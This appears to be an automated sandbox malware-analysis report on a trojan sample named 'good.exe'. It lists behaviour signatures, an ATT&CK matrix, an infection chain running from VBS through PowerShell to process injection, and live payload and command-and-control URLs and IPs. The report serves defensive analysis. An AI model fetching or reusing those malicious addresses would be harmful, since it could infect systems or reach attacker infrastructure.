                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731918964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF731918964
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF731912C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF731912C54
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: fontdrvhost.exe, 0000000C.00000002.2038691904.0000000003530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe

Stealing of Sensitive Information

Source: Yara match | File source: 0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (the number in parentheses after a technique is the signature count badge shown in the report for that cell)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (111) | Valid Accounts | Windows Management Instrumentation (2) | Scripting (111) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (21) | System Time Discovery (1) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Native API (12) | DLL Side-Loading (1) | Access Token Manipulation (1) | Obfuscated Files or Information (1) | LSASS Memory | File and Directory Discovery (2) | Remote Desktop Protocol | Input Capture (21) | Encrypted Channel (21) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Exploitation for Client Execution (1) | Registry Run Keys / Startup Folder (1) | Process Injection (211) | Software Packing (1) | Security Account Manager | System Information Discovery (136) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Command and Scripting Interpreter (2) | Login Hook | Registry Run Keys / Startup Folder (1) | Timestomp (1) | NTDS | Security Software Discovery (321) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | PowerShell (2) | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Process Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (31) | Cached Domain Credentials | Virtualization/Sandbox Evasion (31) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Access Token Manipulation (1) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection (211) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Rundll32 (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1595244 | Sample: good.exe | Start date: 20/01/2025 | Architecture: WINDOWS | Score: 100

Sample-level network: s3-w.us-east-1.amazonaws.com; s3-1-w.amazonaws.com; 2 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

Process tree (trailing numbers are the created-registry-value / created-file counts shown on each node):

good.exe 1 3 (started)
    dropped: C:\Users\user\AppData\Local\Temp\...\fwr.vbs, ASCII
    cmd.exe 3 2 (started)
        wscript.exe 1 (started)
            signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found
            powershell.exe 7 (started)
                signatures: Suspicious powershell command line found; Suspicious execution chain found; Found suspicious powershell code related to unpacking or dynamic code loading
                powershell.exe 14 23 (started)
                    network: 62.60.226.64, 49739, 80, ASLINE-AS-APASLINELIMITEDHK, Iran (ISLAMIC Republic Of); bitbucket.org 185.166.143.48, 443, 49737, AMAZON-02US, Germany; s3-w.us-east-1.amazonaws.com 54.231.134.241, 443, 49738, AMAZON-02US, United States
                    signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Injects a PE file into a foreign processes; Loading BitLocker PowerShell Module
                    RegAsm.exe 1 (started)
                        signatures: Switches to a custom stack to bypass stack traces
                        fontdrvhost.exe (started)
                            signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks if the current machine is a virtual machine (disk enumeration); Switches to a custom stack to bypass stack traces
                        WerFault.exe 2 (started)
                conhost.exe (started)
        conhost.exe (started)
rundll32.exe (started)

Source | Detection | Scanner | Label
good.exe | 18% | ReversingLabs |
good.exe | 23% | Virustotal |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://62.60.226.64/public_files/kmAFAhc.txt | 0% | Avira URL Cloud | safe
https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1x | 0% | Avira URL Cloud | safe
http://62.60.226.64/public_files/kmAFAhc.txtp | 0% | Avira URL Cloud | safe
https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1 | 0% | Avira URL Cloud | safe
http://62.60.226.64 | 0% | Avira URL Cloud | safe
http://www.microsof..Diah | 0% | Avira URL Cloud | safe
http://wwMSFT_PriSmbServerCertificateMapping.cdxml | 0% | Avira URL Cloud | safe
http://www.microsof. | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 54.231.134.241 | true | false | | high
bitbucket.org | 185.166.143.48 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://62.60.226.64/public_files/kmAFAhc.txt | true | Avira URL Cloud: safe | unknown
https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1 | true | Avira URL Cloud: safe | unknown
https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbuseruploads.s3.amazonaws.com | powershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1x | fontdrvhost.exe, 0000000C.00000002.2036496891.0000000002ADC000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://web-security-reports.services.atlassian.com/csp-report/bb-website | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsof..Diah | powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://62.60.226.64/public_files/kmAFAhc.txtp | powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://go.micros | powershell.exe, 0000000A.00000002.1994203864.00000263AECDC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dz8aopenkvv6s.cloudfront.net | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://wwMSFT_PriSmbServerCertificateMapping.cdxml | powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://62.60.226.64 | powershell.exe, 0000000A.00000002.1994203864.00000263AD76A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000A.00000002.1994203864.00000263AD2F3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.cookielaw.org/ | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 0000000A.00000002.2115495362.00000263BA584000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbuseruploads.s3.amazonaws.com/a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2- | powershell.exe, 0000000A.00000002.1994203864.00000263AA919000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aui-cdn.atlassian.com/ | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsof. | powershell.exe, 0000000A.00000002.1993895198.00000263AA320000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | powershell.exe, 0000000A.00000002.1994203864.00000263AA915000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000006.00000002.2324109491.000001E48006A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2324109491.000001E48004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.2324109491.000001E480094000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1994203864.00000263AA511000.00000004.00000800.00020000.00000000.sdmp | false |
                                                                                        high
                                                                                        https://bitbucket.orgpowershell.exe, 0000000A.00000002.1994203864.00000263AA738000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
62.60.226.64 | unknown | Iran (ISLAMIC Republic Of) | 18013 | ASLINE-AS-APASLINELIMITEDHK | true
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
54.231.134.241 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                          Analysis ID:1595244
                                                                                          Start date and time:2025-01-20 15:47:54 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 6m 39s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:17
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:good.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.expl.evad.winEXE@18/8@2/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 25%
                                                                                          HCA Information:Failed
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target fontdrvhost.exe, PID 3384 because there are no executed function
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 7916 because it is empty
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:49:09 | API Interceptor | 46x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.166.143.48 | http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt | malicious | Unknown | bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s3-w.us-east-1.amazonaws.com | https://supreme.1910genetics.com/ | malicious | Unknown | 3.5.29.161
 | https://tlktokshop.biz/ | malicious | Unknown | 16.15.193.39
 | https://tkshap6.vip/ | malicious | Unknown | 52.217.143.49
 | https://store.redeemwalletscode.com/redeemwalletcode/gift/307603441 | malicious | Unknown | 52.217.234.161
 | phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml | malicious | ScreenConnect Tool | 3.5.28.195
 | https://files820.sharefile.com/share/view/535143447b874aa4 | malicious | HTMLPhisher | 52.217.110.116
 | phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml | malicious | ScreenConnect Tool | 52.217.207.73
 | https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.com | malicious | ScreenConnect Tool | 3.5.31.16
 | https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.pl | malicious | ScreenConnect Tool | 52.216.43.161
 | https://yjdjraabb.cc.rs6.net/tn.jsp?f=001cD7EmEKntgjghgQWpq9s2lW_mstWA0PSxRR7i3h0LbK5HgiPx3gu3HduoBs_Rnxmx0i7FlZL9378mrMLd5LlF6GT3bXi2U8GDrXfdsc2qPaLW94j0wm6KbaRHgZvZZRsEDv_wILG0rjmaLTfE5xpKJl15r5SI1xPSSiQsd9YUqKeemOHvTBSlSwV6tHZZ755Z52-jrPWl0FY7ZZ-PKGQ_IxPzhJqeaH15y4Vkailf2jrOpi4MibpjQ==&c=wK30YrUWFPbHl2B1oEErLYSqPkydS65M2el3xt7vMb11ny4WQ0yJgQ==&ch=8IgRaXvzzpu7qgxKTkXdqoYWo2ml_yYytv3GcZQiibggV2wrl_cJAA== | malicious | Unknown | 3.5.10.158
bitbucket.org | phish_alert_iocp_v1.4.48 - 2025-01-17T094354.785.eml | malicious | ScreenConnect Tool | 185.166.143.48
 | phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml | malicious | ScreenConnect Tool | 185.166.143.50
 | https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwxzhlqqgub8rchwk_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a5/0ibbcmvfccobt1ru40aael864dimea/ruixian.wang@huawei.com | malicious | ScreenConnect Tool | 185.166.143.48
 | https://fub.direct/1/wpcpz2KV6CJLjr9Ku5V9crqS4vRSbleRYVQVlbRDO0VhTlcqWS8eK4Wwgpxp66dumoglzvq_ywSiT_-hMwRGjBfgg1rcvHOcCbgDl1KQiWE/https/bioaguabrasil.com.br/c63a6/yqfroqxuuz8idjj1hn2brw3g7czoqi/marian@ferax.com.pl | malicious | ScreenConnect Tool | 185.166.143.50
 | https://nuance-pdf-professional2.software.informer.com/7.2/ | malicious | Unknown | 185.166.143.50
 | atomxml.ps1 | malicious | PureLog Stealer, RHADAMANTHYS, zgRAT | 185.166.143.48
 | invoice-1623385214.pdf.js | malicious | PureLog Stealer, RHADAMANTHYS, zgRAT | 185.166.143.49
 | invoice-1623385214 pdf.js | malicious | PureLog Stealer, RHADAMANTHYS, zgRAT | 185.166.143.50
 | 0a0#U00a0.js | malicious | PureLog Stealer, RHADAMANTHYS, zgRAT | 185.166.143.50
